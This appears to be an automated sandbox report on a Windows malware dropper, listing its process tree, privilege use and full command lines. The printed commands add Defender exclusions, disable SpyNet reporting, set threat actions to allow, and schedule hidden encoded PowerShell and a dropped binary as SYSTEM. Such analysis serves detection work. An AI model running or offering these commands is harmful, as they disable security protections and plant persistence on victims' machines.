N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1028 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 4228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 4228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe

.\Install.exe /zkizdidrXl "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "giYLIiWYa" /SC once /ST 01:13:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "giYLIiWYa"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "giYLIiWYa"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe\" hl /Lssite_idOGH 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe hl /Lssite_idOGH 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

